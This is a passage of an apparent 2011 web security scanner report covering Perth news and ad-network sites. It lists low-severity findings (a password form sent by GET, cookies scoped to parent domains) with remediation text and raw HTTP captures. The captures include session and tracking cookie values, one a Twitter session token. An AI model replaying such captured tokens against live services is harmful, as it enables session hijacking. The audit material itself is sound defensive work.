GET /extern/login_status.php?api_key=135447496484311&app_id=135447496484311&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df347e34f8%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20a74e1c%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bc6f7cb4%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9093e24%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12efd808c%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.25.26
X-Cnection: close
Date: Wed, 07 Sep 2011 14:14:43 GMT
Content-Length: 249

<script type="text/javascript">
parent.postMessage("cb=f9093e24&origin=http\u00253A\u00252F\u00252Fwww.perthnow.com.au\u00252Ff1e2ba23a8&relation=parent&transport=postmessage&frame=f1c723d684", "http:
...[SNIP]...

7. Password field submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /res/libraries/pluck/abc.pluck-1.latest.min.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /res/libraries/pluck/abc.pluck-1.latest.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 21 Feb 2011 00:41:45 GMT
ETag: "16545ae-6697-20d00440"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=6708
Expires: Wed, 07 Sep 2011 16:06:01 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 26263
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853269; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

var ABC=ABC?ABC:{};ABC.Pluck=function(g){function b(h,j,i){if(ABC.Debug&&typeof(console)!=="undefined"&&typeof(console.log)!=="undefined"){console.log("Namespace="+h+", Function="+j+":");console.log(i
...[SNIP]...
L)){j.referringURL=""}}if(v){t=h(v,"&","=");k(t.a,j.loggedInMsg,j.loginContainer);n(j)}else{if(j.autoLogout){n(j)}}}function e(t,u,y,w,x,v){if(!c(t+" #abc_pluck-login-form").length){c(t).append('\n\t\t<form id="abc_pluck-login-form" action="#" method="'+v+'">\n\t\t\t<fieldset>
...[SNIP]...
</label>\n\t\t\t\t<input type="password" id="abc_pluck-login-form-password" name="'+y+'" size="16" maxlength="16" value="" />\n\n\t\t\t\t<input type="hidden" id="abc_pluck-login-form-referrer" name="'+w+'" value="'+x+'" />
...[SNIP]...

8. Cookie scoped to parent domain
There are 83 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


8.1. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json?screen_name=6PR&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=4&clientsource=TWITTERINC_WIDGET&1315422890878=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.6pr.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; k=50.23.123.106.1315399813016770

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:09 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315404909-73233-31934
X-RateLimit-Limit: 150
ETag: "edc1631aa3b276626127bfaca5c64c3d"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 07 Sep 2011 14:15:09 GMT
X-RateLimit-Remaining: 127
X-Runtime: 0.03682
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114b25934d0
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 9262dbfaae94eed8e5d327795189a6f9e3fa6b14
X-RateLimit-Reset: 1315408477
Set-Cookie: guest_id=v1%3A13154049095134771; domain=.twitter.com; path=/; expires=Sat, 07 Sep 2013 02:15:09 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCJaQPUQyASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWYy%250AYzc4ZTc0ODZjMjg4MmI3MmU3NGE3MjNmZTA1OGFiOgxjc3JmX2lkIiVkOWY4%250ANDM5YmZkMWZkNDM4MjliNzA5NGFlZWIzZmRiZg%253D%253D--6c7b0340f09028e47b9b2e51788093d370f5d1f0; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 13688
Connection: close

TWTR.Widget.receiveCallback_1([{"in_reply_to_user_id_str":null,"coordinates":null,"in_reply_to_user_id":null,"contributors":null,"retweeted":false,"retweet_count":7,"id_str":"111365530862108672","retw
...[SNIP]...

8.2. http://a.triggit.com/pxrucm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.triggit.com
Path:   /pxrucm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pxrucm HTTP/1.1
Host: a.triggit.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Set-Cookie: trgu=f0be7f74-7052-4a09-8aa0-ca59d82b3888; domain=.triggit.com; path=/; expires=Wed, 07-Sep-2016 00:00:00 GMT;
Location: http://pixel.rubiconproject.com/tap.php?v=4554&nid=1430&put=f0be7f74-7052-4a09-8aa0-ca59d82b3888&expires=180
Date: Wed, 07 Sep 2011 14:14:14 GMT
Content-Length: 11
Content-Type: text/html; charset=ISO-8859-1

Redirecting

8.3. http://ad.agkn.com/iframe!t=1131!

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:20 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 722
Date: Wed, 07 Sep 2011 14:15:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...

8.4. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6864322&rn=0.7252024607732892&c7=http%3A%2F%2Fweb.adblade.com%2Fimps.php%3Fapp%3D3695%26ad_width%3D300%26ad_height%3D250%26title_font%3D1%26title_color%3D000000%26description_font%3D1%26description_color%3D0066cc%26id%3D83%26output%3Dhtml%26tpUrl%3Dhttp%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000801647%2Fmnum%3D0000905406%2Fcstr%3D35058392%3D_4e677c35%2C2342476011%2C801647%5E905406%5E1184%5E0%2C1_%2Fxsxdata%3D%24xsxdata%2Fbnum%3D35058392%2Foptn%3D64%3Ftrg%3Dhttp%253a%252f%252fwww.adblade.com&c3=&c4=&c5=&c6=&c10=&c15=&c16=&c8=&c9=http%3A%2F%2Fwww.perthnow.com.au%2F&cv=1.8 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 07 Sep 2011 14:14:17 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Fri, 06-Sep-2013 14:14:17 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


8.5. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=535039&ev=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev="1:535461.2925993182975414771.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Sat, 01-Sep-2012 14:16:01 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Thu, 06-Sep-2012 14:16:01 GMT; Path=/
Content-Type: image/gif
Date: Wed, 07 Sep 2011 14:16:01 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

8.6. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.rb.ntc.ace.advertising.com
Path:   /site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth HTTP/1.1
Host: bid.rb.ntc.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Cneonction: close
Date: Wed, 07 Sep 2011 14:14:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.960484.799975.0XMC
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:38 GMT; path=/
Set-Cookie: ASCID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: C2=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: 70524729=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: F1=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: BASE=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: GUID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ROLL=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:38 GMT
Content-Type: text/html; charset=utf-8
ntCoent-Length: 581
Content-Length: 581

<script type="text/javascript" src="http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=0651551808&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_
...[SNIP]...

8.7. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.rb.ntc.ace.advertising.com
Path:   /site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth HTTP/1.1
Host: bid.rb.ntc.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Cneonction: close
Date: Wed, 07 Sep 2011 14:16:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.960484.799975.0XMC
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:16:54 GMT; path=/
Set-Cookie: 70524729=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ASCID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: C2=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: F1=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: BASE=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: GUID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ROLL=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: 54069056=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:16:54 GMT
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 581
Content-Length: 581

<script type="text/javascript" src="http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=8251023631&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=68910242=_
...[SNIP]...

8.8. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.rb.ntc.ace.advertising.com
